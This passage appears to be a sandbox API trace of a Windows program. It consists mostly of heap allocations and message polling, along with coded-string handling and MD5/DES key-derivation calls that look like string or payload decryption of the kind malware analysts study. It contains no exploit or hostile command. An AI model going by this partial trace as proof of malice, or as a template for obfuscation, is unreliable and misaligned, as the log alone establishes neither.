hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0206.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0206.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0206.255] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.255] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.256] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.256] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.256] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.257] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0206.257] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0206.257] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.258] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.258] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0206.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0206.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.260] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.260] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.260] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.260] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.260] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.261] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.261] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.261] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.261] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.261] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.261] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.262] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.262] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.262] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.262] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.262] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.262] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.262] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.262] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.262] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.262] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.262] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0206.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.262] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.263] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.263] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.263] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.263] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.263] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.263] CryptHashData (hHash=0xaa5820, pbData=0x24b1368, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.264] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.264] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.264] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.264] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.264] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.264] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.264] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.264] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa5820, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0206.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0206.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0206.265] RtlAllocateHeap 